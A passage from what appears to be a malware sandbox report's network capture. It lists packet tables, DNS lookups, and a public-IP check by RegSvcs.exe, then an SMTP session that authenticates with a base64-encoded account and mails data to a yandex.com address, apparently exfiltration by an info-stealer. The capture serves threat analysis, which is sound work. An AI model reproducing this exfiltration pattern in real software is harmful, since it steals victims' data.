Jul 1, 2024 20:29:07.481586933 CEST	587	49752	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:07.481648922 CEST	49752	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:07.481699944 CEST	587	49752	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:07.481749058 CEST	49752	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:07.481825113 CEST	587	49752	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:07.481872082 CEST	49752	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:07.481884003 CEST	587	49752	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:07.481913090 CEST	587	49752	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:07.481923103 CEST	587	49752	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:07.481964111 CEST	587	49752	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:07.482069016 CEST	587	49752	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:07.482403994 CEST	587	49752	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:07.482414961 CEST	587	49752	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:07.482424021 CEST	587	49752	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:07.482435942 CEST	587	49752	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:07.482542992 CEST	587	49752	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:07.482553005 CEST	587	49752	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:07.482563019 CEST	587	49752	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:07.482976913 CEST	587	49752	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:07.486555099 CEST	587	49752	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:07.486573935 CEST	587	49752	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:07.486622095 CEST	587	49752	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:07.486637115 CEST	587	49752	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:07.486654997 CEST	587	49752	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:07.486666918 CEST	587	49752	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:07.486692905 CEST	587	49752	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:07.486702919 CEST	587	49752	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:07.486713886 CEST	587	49752	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:07.486788988 CEST	587	49752	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:07.486798048 CEST	587	49752	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:07.486805916 CEST	587	49752	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:07.486871004 CEST	587	49752	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:07.486881018 CEST	587	49752	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:07.486969948 CEST	587	49752	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:07.486979008 CEST	587	49752	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:07.486987114 CEST	587	49752	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:07.486996889 CEST	587	49752	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:07.487008095 CEST	587	49752	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:08.091321945 CEST	587	49752	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:08.160341024 CEST	49752	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:09.642345905 CEST	49752	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:09.647418022 CEST	587	49752	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:10.034501076 CEST	587	49752	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:10.034619093 CEST	49752	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:10.035824060 CEST	49753	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:10.036031008 CEST	587	49752	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:10.036086082 CEST	49752	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:10.039959908 CEST	587	49752	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:10.042540073 CEST	587	49753	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:10.042603016 CEST	49753	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:10.628614902 CEST	587	49753	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:10.628832102 CEST	49753	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:10.636104107 CEST	587	49753	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:10.815536022 CEST	587	49753	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:10.815969944 CEST	49753	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:10.820924997 CEST	587	49753	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:11.001250029 CEST	587	49753	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:11.001467943 CEST	49753	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:11.007335901 CEST	587	49753	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:11.188497066 CEST	587	49753	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:11.188714981 CEST	49753	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:11.193587065 CEST	587	49753	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:11.372123957 CEST	587	49753	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:11.372385025 CEST	49753	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:11.380682945 CEST	587	49753	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:11.614816904 CEST	587	49753	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:11.614967108 CEST	49753	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:11.619858027 CEST	587	49753	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:11.831549883 CEST	587	49753	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:11.831835985 CEST	49753	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:11.831875086 CEST	49753	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:11.831914902 CEST	49753	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:11.831952095 CEST	49753	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:11.833321095 CEST	49753	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:11.836924076 CEST	587	49753	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:11.836998940 CEST	587	49753	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:11.837009907 CEST	587	49753	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:11.837019920 CEST	587	49753	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:11.837066889 CEST	49753	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:11.838392019 CEST	587	49753	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:11.838411093 CEST	587	49753	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:11.838445902 CEST	49753	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:11.838466883 CEST	49753	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:11.838490009 CEST	587	49753	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:11.838500023 CEST	587	49753	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:11.838536024 CEST	49753	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:11.838547945 CEST	49753	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:11.838561058 CEST	587	49753	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:11.838597059 CEST	49753	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:11.838606119 CEST	587	49753	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:11.838614941 CEST	587	49753	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:11.838624001 CEST	587	49753	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:11.838643074 CEST	49753	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:11.838664055 CEST	49753	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:11.838959932 CEST	587	49753	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:11.839025021 CEST	49753	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:11.842178106 CEST	587	49753	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:11.842245102 CEST	49753	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:11.843830109 CEST	587	49753	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:11.843885899 CEST	49753	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:11.843909979 CEST	587	49753	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:11.843947887 CEST	49753	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:11.843962908 CEST	587	49753	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:11.844013929 CEST	49753	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:11.844114065 CEST	587	49753	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:11.844124079 CEST	587	49753	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:11.844158888 CEST	49753	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:11.844177961 CEST	49753	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:11.844187021 CEST	587	49753	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:11.844197035 CEST	587	49753	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:11.844225883 CEST	587	49753	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:11.844232082 CEST	49753	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:11.844244003 CEST	49753	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:11.844271898 CEST	49753	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:11.844355106 CEST	587	49753	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:11.844397068 CEST	49753	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:11.844568968 CEST	587	49753	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:11.844609022 CEST	49753	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:11.849461079 CEST	587	49753	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:11.849471092 CEST	587	49753	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:11.849540949 CEST	49753	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:11.850290060 CEST	587	49753	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:11.850298882 CEST	587	49753	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:11.850306988 CEST	587	49753	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:11.850364923 CEST	49753	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:11.850430965 CEST	587	49753	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:11.850440979 CEST	587	49753	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:11.850449085 CEST	587	49753	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:11.850456953 CEST	587	49753	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:11.850466013 CEST	587	49753	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:11.850474119 CEST	587	49753	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:11.850765944 CEST	587	49753	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:11.850775003 CEST	587	49753	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:11.850783110 CEST	587	49753	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:11.850791931 CEST	587	49753	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:11.850800991 CEST	587	49753	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:11.851460934 CEST	587	49753	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:11.851469994 CEST	587	49753	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:11.851479053 CEST	587	49753	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:11.851486921 CEST	587	49753	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:11.855060101 CEST	587	49753	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:11.855072021 CEST	587	49753	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:11.855079889 CEST	587	49753	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:11.855087996 CEST	587	49753	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:11.855199099 CEST	587	49753	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:11.855207920 CEST	587	49753	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:11.855216026 CEST	587	49753	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:11.855223894 CEST	587	49753	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:11.855834961 CEST	587	49753	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:11.855863094 CEST	587	49753	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:11.855979919 CEST	587	49753	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:11.855989933 CEST	587	49753	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:11.855998039 CEST	587	49753	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:11.856101036 CEST	587	49753	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:11.856111050 CEST	587	49753	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:11.856118917 CEST	587	49753	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:11.856127024 CEST	587	49753	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:11.856137037 CEST	587	49753	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:11.856493950 CEST	587	49753	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:12.636617899 CEST	587	49753	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:12.691620111 CEST	49753	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:18.418917894 CEST	49753	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:18.423979998 CEST	587	49753	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:18.807950974 CEST	587	49753	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:18.809669018 CEST	587	49753	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:18.809766054 CEST	49753	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:18.810102940 CEST	49753	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:18.811129093 CEST	49754	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:18.814838886 CEST	587	49753	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:18.816231966 CEST	587	49754	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:18.816425085 CEST	49754	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:19.414141893 CEST	587	49754	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:19.418207884 CEST	49754	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:19.423173904 CEST	587	49754	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:19.606580973 CEST	587	49754	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:19.607073069 CEST	49754	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:19.611912966 CEST	587	49754	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:19.806065083 CEST	587	49754	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:19.806261063 CEST	49754	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:19.811249018 CEST	587	49754	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:19.999017000 CEST	587	49754	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:19.999155045 CEST	49754	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:20.005079985 CEST	587	49754	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:20.188519955 CEST	587	49754	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:20.188666105 CEST	49754	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:20.193471909 CEST	587	49754	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:20.392357111 CEST	587	49754	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:20.395040035 CEST	49754	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:20.401407003 CEST	587	49754	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:20.583072901 CEST	587	49754	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:20.586976051 CEST	49754	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:20.587012053 CEST	49754	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:20.587012053 CEST	49754	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:20.588264942 CEST	49754	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:20.588264942 CEST	49754	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:20.592144012 CEST	587	49754	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:20.592154980 CEST	587	49754	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:20.592163086 CEST	587	49754	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:20.592252970 CEST	49754	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:20.593118906 CEST	587	49754	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:20.593396902 CEST	587	49754	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:20.593493938 CEST	587	49754	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:20.593503952 CEST	587	49754	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:20.593508005 CEST	587	49754	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:20.593528032 CEST	49754	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:20.593661070 CEST	49754	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:20.598365068 CEST	587	49754	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:20.598612070 CEST	587	49754	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:20.598655939 CEST	587	49754	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:20.598762035 CEST	49754	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:20.598798990 CEST	587	49754	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:20.598822117 CEST	587	49754	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:20.598835945 CEST	587	49754	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:20.598845959 CEST	587	49754	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:20.598928928 CEST	49754	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:20.598968983 CEST	587	49754	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:20.599071980 CEST	49754	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:20.599528074 CEST	587	49754	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:20.599612951 CEST	49754	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:20.603678942 CEST	587	49754	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:20.603971958 CEST	587	49754	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:20.604115009 CEST	49754	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:20.604160070 CEST	587	49754	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:20.604168892 CEST	587	49754	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:20.604263067 CEST	587	49754	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:20.604542971 CEST	587	49754	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:20.604603052 CEST	587	49754	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:20.604614973 CEST	587	49754	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:20.605297089 CEST	587	49754	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:20.608975887 CEST	587	49754	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:20.608985901 CEST	587	49754	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:20.609070063 CEST	587	49754	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:20.609081030 CEST	587	49754	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:20.609088898 CEST	587	49754	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:20.609098911 CEST	587	49754	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:20.609118938 CEST	587	49754	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:20.609127998 CEST	587	49754	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:20.609137058 CEST	587	49754	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:20.609141111 CEST	587	49754	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:20.609152079 CEST	587	49754	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:20.609160900 CEST	587	49754	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:20.609250069 CEST	587	49754	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:20.609270096 CEST	587	49754	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:20.609358072 CEST	587	49754	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:20.609368086 CEST	587	49754	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:20.609409094 CEST	587	49754	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:20.609419107 CEST	587	49754	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:20.609648943 CEST	587	49754	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:20.609659910 CEST	587	49754	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:20.609762907 CEST	587	49754	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:21.193829060 CEST	587	49754	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:21.238477945 CEST	49754	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:24.612020969 CEST	49754	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:24.617010117 CEST	587	49754	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:25.021388054 CEST	587	49754	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:25.021658897 CEST	587	49754	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:25.021791935 CEST	49754	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:25.021887064 CEST	49754	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:25.022111893 CEST	49755	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:25.026698112 CEST	587	49754	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:25.026998997 CEST	587	49755	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:25.027156115 CEST	49755	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:25.655849934 CEST	587	49755	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:25.656055927 CEST	49755	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:25.660914898 CEST	587	49755	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:25.840574980 CEST	587	49755	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:25.842904091 CEST	49755	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:25.847671032 CEST	587	49755	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:26.043775082 CEST	587	49755	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:26.046910048 CEST	49755	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:26.051898956 CEST	587	49755	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:26.234744072 CEST	587	49755	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:26.285355091 CEST	49755	587	192.168.2.4	79.170.44.32

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 1, 2024 20:25:18.406722069 CEST	61379	53	192.168.2.4	1.1.1.1
Jul 1, 2024 20:25:18.414134026 CEST	53	61379	1.1.1.1	192.168.2.4
Jul 1, 2024 20:25:19.686779022 CEST	51125	53	192.168.2.4	1.1.1.1
Jul 1, 2024 20:25:19.752358913 CEST	53	51125	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 1, 2024 20:25:18.406722069 CEST	192.168.2.4	1.1.1.1	0x1738	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Jul 1, 2024 20:25:19.686779022 CEST	192.168.2.4	1.1.1.1	0x1f71	Standard query (0)	mail.fasmacopy.gr	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jul 1, 2024 20:25:18.414134026 CEST	1.1.1.1	192.168.2.4	0x1738	No error (0)	api.ipify.org	104.26.12.205	A (IP address)	IN (0x0001)	false
Jul 1, 2024 20:25:18.414134026 CEST	1.1.1.1	192.168.2.4	0x1738	No error (0)	api.ipify.org	104.26.13.205	A (IP address)	IN (0x0001)	false
Jul 1, 2024 20:25:18.414134026 CEST	1.1.1.1	192.168.2.4	0x1738	No error (0)	api.ipify.org	172.67.74.152	A (IP address)	IN (0x0001)	false
Jul 1, 2024 20:25:19.752358913 CEST	1.1.1.1	192.168.2.4	0x1f71	No error (0)	mail.fasmacopy.gr	79.170.44.32	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.ipify.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	104.26.12.205	443	7516	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-01 18:25:18 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2024-07-01 18:25:19 UTC	211	IN	HTTP/1.1 200 OK Date: Mon, 01 Jul 2024 18:25:19 GMT Content-Type: text/plain Content-Length: 11 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 89c8701dd81a9e05-EWR
2024-07-01 18:25:19 UTC	11	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Jul 1, 2024 20:25:20.732445955 CEST	587	49731	79.170.44.32	192.168.2.4	220 mta2.hi.local ESMTP Exim 4.97.1 Mon, 01 Jul 2024 19:25:20 +0100
Jul 1, 2024 20:25:20.732642889 CEST	49731	587	192.168.2.4	79.170.44.32	EHLO 579569
Jul 1, 2024 20:25:20.920974970 CEST	587	49731	79.170.44.32	192.168.2.4	250-mta2.hi.local Hello 579569 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-CHUNKING 250-STARTTLS 250 HELP
Jul 1, 2024 20:25:20.922017097 CEST	49731	587	192.168.2.4	79.170.44.32	AUTH login aW5mb0BmYXNtYWNvcHkuZ3I=
Jul 1, 2024 20:25:21.109067917 CEST	587	49731	79.170.44.32	192.168.2.4	334 UGFzc3dvcmQ6
Jul 1, 2024 20:25:21.301157951 CEST	587	49731	79.170.44.32	192.168.2.4	235 Authentication succeeded
Jul 1, 2024 20:25:21.301393032 CEST	49731	587	192.168.2.4	79.170.44.32	MAIL FROM:<info@fasmacopy.gr>
Jul 1, 2024 20:25:21.488816977 CEST	587	49731	79.170.44.32	192.168.2.4	250 OK
Jul 1, 2024 20:25:21.488975048 CEST	49731	587	192.168.2.4	79.170.44.32	RCPT TO:<info.superseal@yandex.com>
Jul 1, 2024 20:25:21.833760023 CEST	587	49731	79.170.44.32	192.168.2.4	250 Accepted
Jul 1, 2024 20:25:21.833945036 CEST	49731	587	192.168.2.4	79.170.44.32	DATA
Jul 1, 2024 20:25:22.036159039 CEST	587	49731	79.170.44.32	192.168.2.4	354 Enter message, ending with "." on a line by itself
Jul 1, 2024 20:25:22.036964893 CEST	49731	587	192.168.2.4	79.170.44.32	.
Jul 1, 2024 20:25:22.453134060 CEST	587	49731	79.170.44.32	192.168.2.4	250 OK id=1sOLiL-0000000DBQV-3ysM
Jul 1, 2024 20:26:59.707380056 CEST	49731	587	192.168.2.4	79.170.44.32	QUIT
Jul 1, 2024 20:27:00.096755981 CEST	587	49731	79.170.44.32	192.168.2.4	221 mta2.hi.local closing connection
Jul 1, 2024 20:27:09.308615923 CEST	587	49739	79.170.44.32	192.168.2.4	220 mta2.hi.local ESMTP Exim 4.97.1 Mon, 01 Jul 2024 19:27:09 +0100
Jul 1, 2024 20:27:09.308748960 CEST	49739	587	192.168.2.4	79.170.44.32	EHLO 579569
